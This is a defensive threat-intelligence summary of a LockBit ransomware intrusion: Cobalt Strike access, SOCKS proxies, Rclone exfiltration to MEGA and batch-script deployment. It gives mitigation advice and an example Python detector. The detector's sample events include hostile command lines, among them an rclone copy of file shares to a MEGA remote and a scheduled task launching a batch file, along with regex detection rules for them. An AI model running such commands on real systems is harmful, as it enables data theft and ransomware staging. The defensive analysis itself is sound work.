Cobalt Strike and a Pair of SOCKS Lead to LockBit Ransomware


Summary:

This sophisticated intrusion began in January 2024 when a user downloaded and executed a malicious file named setup_wm.exe, which masqueraded as the Windows Media Configuration Utility with a near-legitimate filename and icon. The executed file dropped a Cobalt Strike beacon that established an outbound C2 channel. Within 30 minutes of execution, the attackers began reconnaissance, using tools such as nltest to enumerate domain controllers.

The threat actors then deployed multiple proxy tools, SystemBC and GhostSOCKS, to maintain persistent access and move laterally within the environment. Over the following days they used a combination of PsExec, WMI, and Rclone. Initial exfiltration attempts over FTP failed, but the attackers later switched to MEGA.io via Rclone and exfiltrated gigabytes of sensitive data within a 16-hour window. On the eleventh day, LockBit ransomware was deployed to all reachable Windows hosts through batch scripts, scheduled tasks, and administrative tools to maximize impact. The resulting encryption was extensive enough to nearly paralyze the victim's operations.

Security Officer Comments:
This incident illustrates how sophisticated and persistent ransomware operations have become. The use of Cobalt Strike for initial access and command and control is a hallmark of advanced threat actors, and the addition of proxies such as SystemBC and GhostSOCKS shows how adaptively they maintain access and evade detection. The attackers' ability to change technique, for example switching from FTP to MEGA.io for data exfiltration, shows their resourcefulness. The 11 days taken to deploy the LockBit ransomware demonstrate careful planning and systematic exploitation of the environment.

Organizations should understand that such an attack is multilayered, with each phase (initial access, persistence, discovery, lateral movement, exfiltration, and impact) deliberately planned. This calls for detection mechanisms at every stage of the kill chain, along with proactive measures to remediate weaknesses before they are exploited.

Suggested Corrections:

  • Enhance Endpoint Detection and Response (EDR): Deploy advanced EDR solutions to monitor and detect malicious activities, such as process injection, unusual use of scheduled tasks, and execution of tools like Cobalt Strike and Rclone.
  • Restrict Privileges: Enforce the principle of least privilege to minimize the potential damage from compromised accounts. Ensure administrative privileges are granted only when absolutely necessary.
  • Monitor Network Traffic: Implement network traffic monitoring to detect and block connections to known malicious C2 servers and proxies, including those used by SystemBC and GhostSOCKS.
  • Strengthen Exfiltration Defenses: Monitor for unauthorized use of file-sharing services and cloud storage solutions like MEGA.io. Deploy data loss prevention (DLP) tools to block unauthorized data transfers.
  • Regularly Audit System Configurations: Periodically review scheduled tasks, registry settings, and Group Policy Objects (GPOs) for unauthorized changes. Implement robust change management processes to detect and respond to suspicious modifications.
  • Patch and Update: Ensure systems are regularly patched to mitigate vulnerabilities that could be exploited for initial access or lateral movement.
  • Backup and Recovery: Maintain secure, offline backups and routinely test disaster recovery procedures. This is critical to minimizing downtime and data loss in the event of a ransomware attack.
  • Security Awareness Training: Train employees to recognize phishing emails and suspicious file downloads to reduce the risk of initial compromise.
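As an added illustration of the EDR and configuration-audit recommendations above (example code written for this summary, not from the report or its author), the following Python detector tags process-creation events with the kill-chain stages this intrusion passed through and escalates when several stages appear across the estate inside a time window. The sample events, host names, paths and regexes are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records (Sysmon Event ID 1 style); not data from the report.
SAMPLE_EVENTS = [
    {"ts": "2024-01-10T09:02:11", "host": "WS01", "image": r"C:\Users\jdoe\Downloads\setup_wm.exe", "cmd": "setup_wm.exe"},
    {"ts": "2024-01-10T09:25:40", "host": "WS01", "image": r"C:\Windows\System32\nltest.exe", "cmd": "nltest /dclist:corp.local"},
    {"ts": "2024-01-10T10:00:00", "host": "WS02", "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
    {"ts": "2024-01-14T13:10:00", "host": "FS01", "image": r"C:\ProgramData\rclone.exe", "cmd": r"rclone copy D:\Shares mega:stage -P"},
    {"ts": "2024-01-20T22:00:05", "host": "DC01", "image": r"C:\Windows\System32\schtasks.exe", "cmd": r"schtasks /create /tn Update /tr C:\temp\run.bat /sc once /st 22:05"},
]

# Kill-chain stage -> regex over "image|cmd", mirroring the stages named in the summary.
RULES = {
    "initial_access": re.compile(r"\\Downloads\\setup_wm\.exe\|", re.I),           # system-utility name run from a download folder
    "discovery":      re.compile(r"\bnltest(\.exe)?\b.*?/dclist", re.I),            # domain controller enumeration
    "exfiltration":   re.compile(r"\brclone(\.exe)?\b.*?\b(mega|ftp)\b", re.I),     # rclone towards the remotes the report names
    "impact_staging": re.compile(r"\bschtasks(\.exe)?\b.*?/create.*?\.bat\b", re.I),  # scheduled task launching a batch file
}

def classify(event):
    """Return the kill-chain stage an event matches, or None."""
    haystack = f'{event["image"]}|{event["cmd"]}'
    for stage, rx in RULES.items():
        if rx.search(haystack):
            return stage
    return None

def detect(events):
    """Map each matched stage to its (ts, host, cmd) hits, sorted by time."""
    hits = defaultdict(list)
    for ev in events:
        stage = classify(ev)
        if stage:
            hits[stage].append((ev["ts"], ev["host"], ev["cmd"]))
    return {s: sorted(v) for s, v in hits.items()}

def correlate(events, window_days=14, min_stages=3):
    """Escalate when >= min_stages distinct stages occur estate-wide within window_days.
    The intrusion here spanned 11 days, so a per-host or per-hour view alone would miss it."""
    staged = [(datetime.fromisoformat(ev["ts"]), classify(ev)) for ev in events]
    timeline = sorted((t, s) for t, s in staged if s)
    window = timedelta(days=window_days)
    for i, (start, _) in enumerate(timeline):
        stages = {s for t, s in timeline[i:] if t - start <= window}
        if len(stages) >= min_stages:
            return sorted(stages)
    return []
```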

IOCs and additional detection content are available via the source link.

Link(s):
https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/